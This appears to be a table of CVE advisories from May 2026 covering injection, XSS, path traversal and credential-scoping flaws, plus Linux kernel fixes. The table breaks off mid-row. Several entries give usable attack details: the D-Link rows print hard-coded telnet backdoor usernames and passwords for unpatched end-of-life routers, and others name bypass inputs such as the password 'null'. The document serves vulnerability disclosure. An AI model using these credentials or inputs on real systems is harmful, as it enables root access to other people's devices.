| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. In version 0.31.4.0, an attacker can achieve Full Account Takeover & Privilege Escalation via Stored DOM XSS in backup module filename field manipulated via a sql file that tampers with the file name field to contain hidden XSS payload. This issue has been patched in version 0.31.5.0. | 2026-05-07 | 9.1 | CVE-2026-41201 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-qxpq-82f3-xj47 https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to version 4.6.9, the fix for PraisonAI's MCP command handling does not add a command allowlist or argument validation to parse_mcp_command(), allowing arbitrary executables like bash, python, or /bin/sh with inline code execution flags to pass through to subprocess execution. This issue has been patched in version 4.6.9. | 2026-05-08 | 9.8 | CVE-2026-41497 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9qhq-v63v-fv3j https://github.com/MervinPraison/PraisonAI/commit/47bff65413beaa3c21bf633c1fae4e684348368c |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to version 3.3.8, a command injection vulnerability exists in github.com/elcterm/electerm/npm/install.js:150. The runMac() function appends attacker-controlled remote releaseInfo.name directly into an exec("open ...") command without validation. This issue has been patched in version 3.3.8. | 2026-05-08 | 9.8 | CVE-2026-41500 | https://github.com/electerm/electerm/security/advisories/GHSA-wxw2-rwmh-vr8f https://github.com/electerm/electerm/commit/59708b38c8a52f5db59d7d4eff98e31d573128ee https://github.com/electerm/electerm/releases/tag/v3.3.8 |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to version 3.3.8, a command injection vulnerability exists in github.com/elcterm/electerm/npm/install.js:130. The runLinux() function appends attacker-controlled remote version strings directly into an exec("rm -rf ...") command without validation. This issue has been patched in version 3.3.8. | 2026-05-08 | 9.8 | CVE-2026-41501 | https://github.com/electerm/electerm/security/advisories/GHSA-8x35-hph8-37hq https://github.com/electerm/electerm/commit/59708b38c8a52f5db59d7d4eff98e31d573128ee https://github.com/electerm/electerm/releases/tag/v3.3.8 |
| mauriciopoppe--math-codegen | math-codegen generates code from mathematical expressions. Prior to version 0.4.3, string literal content passed to cg.parse() is injected verbatim into a new Function() body without sanitization. This allows an attacker to execute arbitrary system commands when user-controlled input reaches the parser. Any application exposing a math evaluation endpoint where user input flows into cg.parse() is vulnerable to full RCE. This issue has been patched in version 0.4.3. | 2026-05-08 | 9.8 | CVE-2026-41507 | https://github.com/mauriciopoppe/math-codegen/security/advisories/GHSA-p6x5-p4xf-cc4r https://github.com/mauriciopoppe/math-codegen/pull/11 https://github.com/mauriciopoppe/math-codegen/commit/4bb52d3030683362b3559ee8dd91350555a05f6b |
| 0din-ai--ai-scanner | ai-scanner is an AI model safety scanner built on NVIDIA garak. From version 1.0.0 to before version 1.4.1, there is a remote code execution vulnerability via JavaScript injection in `BrowserAutomation::PlaywrightService`. This issue has been patched in version 1.4.1. | 2026-05-08 | 9.9 | CVE-2026-41512 | https://github.com/0din-ai/ai-scanner/security/advisories/GHSA-r27j-xxgx-f5vr https://github.com/0din-ai/ai-scanner/releases/tag/v1.4.1 |
| enchant97--note-mark | Note Mark is an open-source note-taking application. In version 0.19.2, IsPasswordMatch in backend/db/models.go falls back to a hard-coded bcrypt("null") placeholder whenever a user has no stored password. OIDC-registered users are created with an empty password, so anyone who submits password: "null" to the internal login endpoint receives a valid session for that user. The bypass is unauthenticated and requires no user interaction. This issue has been patched in version 0.19.3. | 2026-05-04 | 9.4 | CVE-2026-41571 | https://github.com/enchant97/note-mark/security/advisories/GHSA-pxf8-6wqm-r6hh https://github.com/enchant97/note-mark/releases/tag/v0.19.3 |
| inducer--relate | RELATE is a web-based courseware package. Prior to commit 2f68e16, there is a timing attack vulnerability in course/auth.py - check_sign_in_key(). This issue has been patched via commit 2f68e16. | 2026-05-08 | 9 | CVE-2026-41588 | https://github.com/inducer/relate/security/advisories/GHSA-78j7-9xr9-2728 https://github.com/inducer/relate/commit/2f68e16cd3b96d25c188c1aa3f7e13cdb15cdaeb |
| charmbracelet--wish | Wish is an SSH server with defaults and a collection of middlewares. From version 2.0.0 to before version 2.0.1, the SCP middleware in charm.land/wish/v2 is vulnerable to path traversal attacks. A malicious SCP client can read arbitrary files from the server, write arbitrary files to the server, and create directories outside the configured root directory by sending crafted filenames containing ../ sequences over the SCP protocol. This issue has been patched in version 2.0.1. | 2026-05-07 | 9.6 | CVE-2026-41589 | https://github.com/charmbracelet/wish/security/advisories/GHSA-xjvp-7243-rg9h https://github.com/charmbracelet/wish/releases/tag/v2.0.1 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, the /user-setup/{hash} endpoint accepts a 60-character random invite_hash to set a new user's password. The endpoint performs no expiration check - the hash remains valid indefinitely until consumed. Combined with realistic hash-leakage scenarios (forwarded invite emails, HTTP referrer to external CDNs on the setup page, server-side log exposure, abandoned invite emails in shared inboxes), this enables unauthenticated permanent account takeover months or years after invite issuance. If the leaked invite was sent to an admin, the takeover yields admin access. This issue has been patched in version 1.8.217. | 2026-05-07 | 9.1 | CVE-2026-41902 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-hqff-cwx7-3jpm https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217 |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains a hard-coded credentials vulnerability in its docker-compose-apache.yaml configuration that allows unauthenticated attackers to access the bundled phpMyAdmin container with pre-configured database credentials. Attackers can connect to the phpMyAdmin port to gain unrestricted read and write access to the entire Vvveb database, including administrator password hashes, customer personally identifiable information, and order data, enabling account takeover and data manipulation. | 2026-05-06 | 9.8 | CVE-2026-41930 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-g38h-mr9p-fjmf https://github.com/givanz/Vvveb/commit/f85ca7c2bc389bda3cc2eca87b2514581a628c32 https://www.vulncheck.com/advisories/vvveb-hard-coded-credentials-information-disclosure-via-phpmyadmin |
| orneryd--NornicDB | Nornicdb is a distributed low-latency, Graph+Vector, Temporal MVCC with all sub-ms HNSW search, graph traversal, and writes. Prior to version 1.0.42-hotfix, the --address CLI flag (and NORNICDB_ADDRESS / server.host config key) is plumbed through to the HTTP server correctly but never reaches the Bolt server config. The Bolt listener therefore always binds to the wildcard address (all interfaces), regardless of what the user configures. On a LAN, this exposes the graph database - with its default admin:password credentials - to any device sharing the network. This issue has been patched in version 1.0.42-hotfix. | 2026-05-08 | 9.8 | CVE-2026-42072 | https://github.com/orneryd/NornicDB/security/advisories/GHSA-2hp7-65r3-wv54 https://github.com/orneryd/NornicDB/commit/adce4f9a9fc7b6aada07c0bfa2d737cd7a6efaca https://github.com/orneryd/NornicDB/releases/tag/v1.0.42 |
| EvoMap--evolver | Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3. | 2026-05-04 | 9.8 | CVE-2026-42076 | https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53 https://github.com/EvoMap/evolver/releases/tag/v1.69.3 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. From version 6.7.0 to before version 7.0.0-rc3, a SQL injection vulnerability exists in the Time-Series Database (TSDB) component of COSMOS. The tsdb_lookup function in the cvt_model.rb file directly places user-supplied input into a SQL query without sanitizing the input. As a result, a user can break out of the initial SQL statement and execute arbitrary SQL commands, including deleting data. This issue has been patched in version 7.0.0-rc3. | 2026-05-04 | 9.6 | CVE-2026-42087 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-v529-vhwc-wfc5 https://github.com/OpenC3/cosmos/commit/9ba60c09c8836a37a2e4ea67ab35fe403e041415 https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0-rc3, the Script Runner widget allows users to execute Python and Ruby scripts directly from the openc3-COSMOS-script-runner-api container. Because all the docker containers share a network, users can execute specially crafted scripts to bypass the API permissions check and perform administrative actions, including reading and modifying data inside the Redis database, which can be used to read secrets and change COSMOS settings, as well as read and write to the buckets service, which holds configuration, log, and plugin files. These actions are normally only available from the Admin Console or with administrative privileges. Any user with permission to create and run scripts can connect to any service in the docker network. This issue has been patched in version 7.0.0-rc3. | 2026-05-04 | 9.6 | CVE-2026-42088 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-2wvh-87g2-89hr https://github.com/OpenC3/cosmos/releases/tag/v7.0.0 https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3 |
| streetwriters--notesnook | Notesnook is a note-taking app focused on user privacy & ease of use. Prior to Notesnook Web/Desktop version 3.3.15 and prior to Notesnook iOS/Android version 3.3.20, a stored XSS vulnerability in the note export flow can be escalated to remote code execution in the desktop app. The root cause is that exported note fields such as title, headline, and content are inserted into the generated HTML template without HTML escaping. When the note is later exported to PDF, Notesnook renders that HTML into a same-origin, unsandboxed iframe using iframe.srcdoc = .... Injected script executes in the Notesnook origin. In the desktop app, this becomes RCE because Electron is configured with nodeIntegration: true and contextIsolation: false. This issue has been patched in Notesnook Web/Desktop version 3.3.15 and Notesnook iOS/Android version 3.3.20. | 2026-05-04 | 9.6 | CVE-2026-42090 | https://github.com/streetwriters/notesnook/security/advisories/GHSA-fjm8-jg78-89h4 https://github.com/streetwriters/notesnook/releases/tag/3.3.20-android https://github.com/streetwriters/notesnook/releases/tag/v3.3.15 |
| useplunk--plunk | Plunk is an open-source email platform built on top of AWS SES. Prior to version 0.9.0, the /webhooks/sns endpoint accepts Amazon SNS notification payloads from unauthenticated requests without verifying the SNS signature, certificate, or topic ARN, meaning anyone can forge a valid-looking webhook request. This allows an unauthenticated attacker to spoof SNS events to trigger workflow automations, unsubscribe contacts, manipulate email delivery metrics, and potentially exhaust billing credits. This issue has been patched in version 0.9.0. | 2026-05-08 | 9.1 | CVE-2026-42193 | https://github.com/useplunk/plunk/security/advisories/GHSA-9792-w86v-gx53 https://github.com/useplunk/plunk/releases/tag/v0.9.0 |
| labring--FastGPT | FastGPT is an AI Agent building platform. From version 4.14.10 to before version 4.14.13, the agent-sandbox component of FastGPT is vulnerable to unauthenticated Remote Code Execution (RCE). The startup script entrypoint.sh initializes code-server with the --auth none flag and binds the service to all network interfaces (0.0.0.0:8080). This configuration allows any user with network access to the port to bypass authentication and gain full control over the sandbox environment. This issue has been patched in version 4.14.13. | 2026-05-08 | 9.8 | CVE-2026-42302 | https://github.com/labring/FastGPT/security/advisories/GHSA-34rc-438g-7w78 https://github.com/labring/FastGPT/pull/6781 https://github.com/labring/FastGPT/commit/9d1cafce9241430fb5bcdd646455055c5f4ae0a4 https://github.com/labring/FastGPT/releases/tag/v4.14.13 |
| getsentry--sentry | Sentry is an error tracking and performance monitoring tool. From version 21.12.0 to before version 26.4.1, a critical vulnerability was discovered in the SAML SSO implementation of Sentry. The vulnerability allows an attacker to take over any user account by using a malicious SAML Identity Provider and another organization on the same Sentry instance. The victim email address must be known in order to exploit this vulnerability. This issue has been patched in version 26.4.1. | 2026-05-08 | 9.1 | CVE-2026-42354 | https://github.com/getsentry/sentry/security/advisories/GHSA-rcmw-7mc7-3rj7 https://github.com/getsentry/sentry/pull/113720 https://github.com/getsentry/sentry/commit/0c67558ae7fe08738912d4c5233b53ead048da3b https://github.com/getsentry/sentry/releases/tag/26.4.1 |
| GeoVision Inc.--GV-LPC2011/LPC2211 | An os command injection vulnerability exists in the DdnsSetting.cgi functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted DDNS configuration can lead to arbitrary command execution. An attacker can modify a configuration value to trigger this vulnerability. | 2026-05-04 | 9.9 | CVE-2026-42364 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| GeoVision Inc.--GV-LPC2011/LPC2211 | A privilege escalation vulnerability exists in the Web Interface functionality of GeoVision LPC2011/LPC2211 1.10. A specially crafted HTTP request can lead to execute priviledged operation. An attacker can visit a webpage to trigger this vulnerability. | 2026-05-04 | 9.9 | CVE-2026-42368 | https://www.geovision.com.tw/cyber_security.php https://https://talosintelligence.com/vulnerability_reports/ |
| GeoVision Inc.--GV-VMS V20.0.2 | A stack overflow vulnerability exists in the WebCam Server Login functionality of GeoVision GV-VMS V20 20.0.2. A specially crafted HTTP request can lead to an arbitrary code execution. An attacker can make an unauthenticated HTTP request to trigger this vulnerability. | 2026-05-04 | 9 | CVE-2026-42370 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| D-Link--DIR-605L Firmware | D-Link DIR-605L Hardware Revision B2 (End-of-Life, EOL) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn76_dlwbr_dir605L" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 9.8 | CVE-2026-42373 | D-Link DIR-605L B2 Hardcoded Telnet Backdoor - Securin Advisory |
| D-Link--DIR-600L Firmware | D-Link DIR-600L Hardware Revision B1 (End-of-Life) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn61_dlwbr_dir600L" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 9.8 | CVE-2026-42374 | D-Link DIR-600L B1 Hardcoded Telnet Backdoor - Securin Advisory |
| D-Link--DIR-600L Firmware | D-Link DIR-600L Hardware Revision A1 (End-of-Life) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /bin/telnetd.sh with the username "Alphanetworks" and the static password "wrgn35_dlwbr_dir600l" read from /etc/alpha_config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 9.8 | CVE-2026-42375 | D-Link DIR-600L A1 Hardcoded Telnet Backdoor - Securin Advisory |
| D-Link--DIR-456U Firmware | D-Link DIR-456U Hardware Revision A1 (End-of-Life, EOL) contains a hardcoded telnet backdoor. The device starts a telnet daemon at boot via /etc/init0.d/S80telnetd.sh with the username "Alphanetworks" and the static password "whdrv01_dlob_dir456U" read from /etc/config/image_sign. The custom telnetd binary accepts a -u user:password flag, and the custom login binary uses strcmp() to validate credentials. Successful authentication grants an unauthenticated attacker on the local network a root shell with full administrative control. The device has reached End-of-Life (EOL) and will not receive patches. | 2026-05-04 | 9.8 | CVE-2026-42376 | D-Link DIR-456U A1 Hardcoded Telnet Backdoor - Securin Advisory |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.1.0, all Docker container management endpoints in Termix interpolate the containerId URL path parameter and WebSocket message field directly into shell commands executed via ssh2.Client.exec() on remote managed servers without any sanitization or validation. An authenticated attacker can inject arbitrary OS commands by crafting a malicious container ID, achieving Remote Code Execution on any managed server. This issue has been patched in version 2.1.0. | 2026-05-08 | 9.9 | CVE-2026-42454 | https://github.com/Termix-SSH/Termix/security/advisories/GHSA-c2g2-hqgq-6w9v https://github.com/Termix-SSH/Termix/releases/tag/release-2.1.0-tag |
| go-pkgz--auth | auth provides authentication via oauth2, direct and email. From versions 1.18.0 to before 1.25.2 and 2.0.0 to before 2.1.2, the Patreon OAuth provider maps every authenticated Patreon account to the same local user.ID, instead of deriving a unique ID from the Patreon account returned by Patreon. In practice, this means all Patreon-authenticated users of an application using this library are collapsed into a single local identity. Any application that trusts token.User.ID as the stable account key can end up mixing or fully merging unrelated Patreon users, which can lead to cross-account access, privilege confusion, and subscription-state leakage. This issue has been patched in versions 1.25.2 and 2.1.2. | 2026-05-09 | 9.1 | CVE-2026-42560 | https://github.com/go-pkgz/auth/security/advisories/GHSA-f6qq-3m3h-4g42 https://github.com/go-pkgz/auth/commit/c0b15ee72a8401da83c01781c16636c521f42698 https://github.com/go-pkgz/auth/releases/tag/v1.25.2 https://github.com/go-pkgz/auth/releases/tag/v2.1.2 |
| phpvms--phpvms | phpVMS is a PHP application to run and simulate an airline. Prior to version 7.0.6, a critical vulnerability in phpVMS allowed unauthenticated access to a legacy import feature. This issue has been patched in version 7.0.6. | 2026-05-09 | 9.4 | CVE-2026-42569 | https://github.com/phpvms/phpvms/security/advisories/GHSA-fv26-4939-62fh https://github.com/phpvms/phpvms/commit/f59ba8e0e8fc25c60c3faf14e526cfd49df3f7dc https://github.com/phpvms/phpvms/releases/tag/7.0.6 https://github.com/phpvms/phpvms/releases/tag/7.0.7 |
| Arelle--Arelle | Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges. | 2026-05-04 | 9.8 | CVE-2026-42796 | https://github.com/Arelle/Arelle/releases/tag/2.39.10 https://github.com/Arelle/Arelle/pull/2320 https://www.vulncheck.com/advisories/arelle-unauthenticated-rce-via-rest-configure |
| Apache Software Foundation--Apache Polaris | Apache Polaris can issue broad temporary ("vended") storage credentials during staged table creation before the effective table location has been validated or durably reserved. Those temporary credentials are meant to limit the scope of accessible table data and metadata, but this scope limitation becomes attacker- directed because the attacker can choose a reachable target location. In the confirmed variant, if the caller supplies a custom `location` during stage create and requests credential vending, Apache Polaris uses that location to construct delegated storage credentials immediately. The stage-create path itself neither runs the normal location validation nor the overlap checks before those credentials are issued. Closely related to that, the staged-create flow also accepts `write.data.path` / `write.metadata.path` in the request properties and feeds those location overrides into the same effective table location set used for credential vending. Those fields are secondary to the main custom-`location` exploit, but they are still attacker-influenced location inputs that should be validated before any credentials are issued. | 2026-05-04 | 9.9 | CVE-2026-42809 | https://lists.apache.org/thread/8tfsr8y7pgq6rdcvjx95hkcr47td671r |
| Apache Software Foundation--Apache Polaris | Apache Polaris accepts literal `*` characters in namespace and table names. When it later builds temporary S3 access policies for delegated table access, those same characters appear to be reused unescaped in S3 IAM resource patterns and `s3:prefix` conditions. In S3 IAM policy matching, `*` is treated as a wildcard rather than as ordinary text. That means temporary credentials issued for one crafted table can match the storage path of a different table. In private testing against Polaris 1.4.0 using Polaris' AWS S3 temporary- credential path on both MinIO and real AWS S3, credentials returned for crafted tables such as `f*.t1`, `f*.*`, `*.*`, and `foo.*` could reach other tables' S3 locations. The confirmed behavior includes: - reading another table's metadata control file ([Iceberg metadata JSON]); - listing another table's exact S3 table prefix ([table prefix]); - and, when write delegation was returned for the crafted table, creating and deleting an object under another table's exact S3 table prefix. A control case using ordinary different names did not allow the same cross-table access. A least-privilege AWS S3 variant was also confirmed in which the attacker principal had no Polaris permissions on the victim table and only the minimal permissions required to create and use a crafted wildcard table (namespace-scoped `TABLE_CREATE` and `TABLE_WRITE_DATA` on `*`). In that setup, direct Polaris access to `foo.t1` remained forbidden, but the attacker could still create and load `*.*`, receive delegated S3 credentials, and use those credentials to list, read, create, and delete objects under `foo.t1`. In Iceberg, the metadata JSON file is a control file: it tells readers which data files belong to the table, which snapshots exist, and which table version to read. So unauthorized access to it is already a meaningful confidentiality problem. The confirmed write-capable variant means the issue is not limited to disclosure. | 2026-05-04 | 9.9 | CVE-2026-42810 | https://lists.apache.org/thread/gg3qq9sqg4hdjmprqy46p40xmln61dm9 |
| Apache Software Foundation--Apache Polaris | In plain terms, Apache Polaris is supposed to issue short-lived GCS credentials that only work for one table's files, but a crafted namespace or table name can cause those credentials to work across the configured bucket instead. Apache Polaris builds Google Cloud Storage downscoped credentials by creating a Credential Access Boundary (CAB) with CEL conditions that are intended to restrict access to the requested table's storage path. The relevant CEL string is built from the bucket name and the table path. That table path is derived from namespace and table identifiers. In current code, that path appears to be inserted into the CEL expression without escaping. As a result, a namespace or table identifier containing a single quote and other URI-safe CEL fragments can break out of the intended quoted string and change the meaning of the CEL condition. In private testing against Polaris 1.4.0 on real Google Cloud Storage, it was confirmed that Polaris accepted a crafted identifier and returned delegated GCS credentials whose CEL path restriction had effectively collapsed. Those delegated credentials could then: - list another table's object prefix; - read another table's metadata control file (Iceberg metadata JSON); - create and delete an object under another table's object prefix; - and also list, read, create, and delete objects under an unrelated external prefix in the same bucket that was not part of any table path. That last point is important. The issue is not limited to "another table". In the confirmed setup, once Apache Polaris returned credentials for the crafted table, the path restriction inside the configured bucket was effectively gone. The practical effect is that temporary credentials for one crafted table can be broader than the table Polaris was asked to authorize, and can become effectively bucket-wide within the configured bucket. The current GCS testing used a Polaris principal with broad catalog privileges for setup. A separate least-privilege Polaris RBAC variant has not yet been tested on GCS. However, the storage-credential broadening behavior itself has been confirmed on GCS. | 2026-05-04 | 9.9 | CVE-2026-42811 | https://lists.apache.org/thread/hovn5hmkj9wj7v9cd8sn67svg03klgvg |
| Apache Software Foundation--Apache Polaris | In Apache Iceberg, the table's metadata files are control files: they tell readers which data files belong to the table and which table version to read. `write.metadata.path` is an optional table property that tells Polaris where to write those metadata files. For a table already registered in a Polaris-managed catalog, changing only that property through an `ALTER TABLE`-style settings change (not a row-level `INSERT`, `SELECT`, `UPDATE`, or `DELETE`) bypasses the commit-time branch that is supposed to revalidate storage locations. The full persisted / credential-vending variant requires the affected catalog to have `polaris.config.allow.unstructured.table.location=true`, with `allowedLocations` broad enough to include the attacker-chosen target. `allowedLocations` is the admin-configured allowlist of storage paths that the catalog is allowed to use. Public project materials suggest that this flag is a real supported compatibility / layout mode, not just a contrived lab-only prerequisite. In that configuration, a user who can change table settings can cause Apache Polaris itself to write new table metadata to an attacker-chosen reachable storage location before the intended location-validation branch runs. If the later concrete-path validation also accepts that location, Polaris persists the resulting metadata path into stored table state. Later table-load and credential APIs can then return temporary cloud-storage credentials for the same location without revalidating it. In plain terms, Polaris can later hand out temporary storage access for the same attacker-chosen area. That attacker-chosen area does not need to be limited to the poisoned table's own files. If it is a broader storage prefix, another table's prefix, or, depending on configuration or provider behavior, even a bucket/container root, the resulting disclosure or corruption scope can extend to any data and metadata Polaris can reach there. The practical consequences are therefore similar to the staged-create credential-vending issue already discussed: data and metadata reachable in that storage scope can be exposed and, if write-capable credentials are later issued, modified, corrupted, or removed. Even before that later credential step, Polaris itself performs the metadata write to the unchecked location. So the core issue is not only later credential vending. The primary defect is that Polaris skips its intended location checks before performing a security- sensitive metadata write when only `write.metadata.path` changes. When `polaris.config.allow.unstructured.table.location=false`, current code review suggests the later `updateTableLike(...)` validation usually rejects out-of-tree metadata locations before the unsafe path is persisted. That may reduce the persisted / credential-vending variant, but it does not prevent the underlying defect: Polaris still skips the intended pre-write location check when only `write.metadata.path` changes. | 2026-05-04 | 9.9 | CVE-2026-42812 | https://lists.apache.org/thread/wxd2wj3p0smvrk84msv317wg5tp3jtw9 |
| argoproj--argo-cd | Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD's ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server's Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9. | 2026-05-07 | 9.6 | CVE-2026-42880 | https://github.com/argoproj/argo-cd/security/advisories/GHSA-3v3m-wc6v-x4x3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: handle wraparound when searching for blocks for indirect mapped blocks Commit 4865c768b563 ("ext4: always allocate blocks only from groups inode can use") restricts what blocks will be allocated for indirect block based files to block numbers that fit within 32-bit block numbers. However, when using a review bot running on the latest Gemini LLM to check this commit when backporting into an LTS based kernel, it raised this concern: If ac->ac_g_ex.fe_group is >= ngroups (for instance, if the goal group was populated via stream allocation from s_mb_last_groups), then start will be >= ngroups. Does this allow allocating blocks beyond the 32-bit limit for indirect block mapped files? The commit message mentions that ext4_mb_scan_groups_linear() takes care to not select unsupported groups. However, its loop uses group = *start, and the very first iteration will call ext4_mb_scan_group() with this unsupported group because next_linear_group() is only called at the end of the iteration. After reviewing the code paths involved and considering the LLM review, I determined that this can happen when there is a file system where some files/directories are extent-mapped and others are indirect-block mapped. To address this, add a safety clamp in ext4_mb_scan_groups(). | 2026-05-05 | 9.8 | CVE-2026-43067 | https://git.kernel.org/stable/c/f89bba144938921a2249237ad04a0183ff3f8930 https://git.kernel.org/stable/c/83170a05908b6cf2fb3235d3065bf613ff866f3c https://git.kernel.org/stable/c/4bec4a498ce86314d470ae6144120461f2138c29 https://git.kernel.org/stable/c/12624c5b724a81e14e532972b40d863b0de3b7d1 https://git.kernel.org/stable/c/2a368ccddfc492a0aa951e2caef2985f20e96503 https://git.kernel.org/stable/c/bb81702370fad22c06ca12b6e1648754dbc37e0f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dcache: Limit the minimal number of bucket to two There is an OOB read problem on dentry_hashtable when user sets 'dhash_entries=1': BUG: unable to handle page fault for address: ffff888b30b774b0 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page Oops: Oops: 0000 [#1] SMP PTI RIP: 0010:__d_lookup+0x56/0x120 Call Trace: d_lookup.cold+0x16/0x5d lookup_dcache+0x27/0xf0 lookup_one_qstr_excl+0x2a/0x180 start_dirop+0x55/0xa0 simple_start_creating+0x8d/0xa0 debugfs_start_creating+0x8c/0x180 debugfs_create_dir+0x1d/0x1c0 pinctrl_init+0x6d/0x140 do_one_initcall+0x6d/0x3d0 kernel_init_freeable+0x39f/0x460 kernel_init+0x2a/0x260 There will be only one bucket in dentry_hashtable when dhash_entries is set as one, and d_hash_shift is calculated as 32 by dcache_init(). Then, following process will access more than one buckets(which memory region is not allocated) in dentry_hashtable: d_lookup b = d_hash(hash) dentry_hashtable + ((u32)hashlen >> d_hash_shift) // The C standard defines the behavior of right shift amounts // exceeding the bit width of the operand as undefined. The // result of '(u32)hashlen >> d_hash_shift' becomes 'hashlen', // so 'b' will point to an unallocated memory region. hlist_bl_for_each_entry_rcu(b) hlist_bl_first_rcu(head) h->first // read OOB! Fix it by limiting the minimal number of dentry_hashtable bucket to two, so that 'd_hash_shift' won't exceeds the bit width of type u32. | 2026-05-05 | 9.1 | CVE-2026-43071 | https://git.kernel.org/stable/c/426ef05e82ee52c8d0e95fc0808b7383d8352d73 https://git.kernel.org/stable/c/ddd57ebce245f9c7e2f6902a6c087d6186d2385d https://git.kernel.org/stable/c/755b40903eff563768d4d96fd4ef51ec48adde3b https://git.kernel.org/stable/c/5718df131ab78897a9dd1f2e71c3ba732d4392af https://git.kernel.org/stable/c/277cedabb0ab86baae83fa58218be13c6d3e5526 https://git.kernel.org/stable/c/f08fe8891c3eeb63b73f9f1f6d97aa629c821579 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ioam6: fix OOB and missing lock When trace->type.bit6 is set: if (trace->type.bit6) { ... queue = skb_get_tx_queue(dev, skb); qdisc = rcu_dereference(queue->qdisc); This code can lead to an out-of-bounds access of the dev->_tx[] array when is_input is true. In such a case, the packet is on the RX path and skb->queue_mapping contains the RX queue index of the ingress device. If the ingress device has more RX queues than the egress device (dev) has TX queues, skb_get_queue_mapping(skb) will exceed dev->num_tx_queues. Add a check to avoid this situation since skb_get_tx_queue() does not clamp the index. This issue has also revealed that per queue visibility cannot be accurate and will be replaced later as a new feature. While at it, add missing lock around qdisc_qstats_qlen_backlog(). The function __ioam6_fill_trace_data() is called from both softirq and process contexts, hence the use of spin_lock_bh() here. | 2026-05-06 | 9.1 | CVE-2026-43083 | https://git.kernel.org/stable/c/6d1d9ed9b409e0662241e3d245d574a18f643494 https://git.kernel.org/stable/c/95a1334748c95dd15546056280ade0c4b8dd7b78 https://git.kernel.org/stable/c/b30b1675aa2bcf0491fd3830b051df4e08a7c8ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_pipapo_avx2: don't return non-matching entry on expiry New test case fails unexpectedly when avx2 matching functions are used. The test first loads a ranomly generated pipapo set with 'ipv4 . port' key, i.e. nft -f foo. This works. Then, it reloads the set after a flush: (echo flush set t s; cat foo) | nft -f - This is expected to work, because its the same set after all and it was already loaded once. But with avx2, this fails: nft reports a clashing element. The reported clash is of following form: We successfully re-inserted a . b c . d Then we try to insert a . d avx2 finds the already existing a . d, which (due to 'flush set') is marked as invalid in the new generation. It skips the element and moves to next. Due to incorrect masking, the skip-step finds the next matching element *only considering the first field*, i.e. we return the already reinserted "a . b", even though the last field is different and the entry should not have been matched. No such error is reported for the generic c implementation (no avx2) or when the last field has to use the 'nft_pipapo_avx2_lookup_slow' fallback. Bisection points to 7711f4bb4b36 ("netfilter: nft_set_pipapo: fix range overlap detection") but that fix merely uncovers this bug. Before this commit, the wrong element is returned, but erronously reported as a full, identical duplicate. The root-cause is too early return in the avx2 match functions. When we process the last field, we should continue to process data until the entire input size has been consumed to make sure no stale bits remain in the map. | 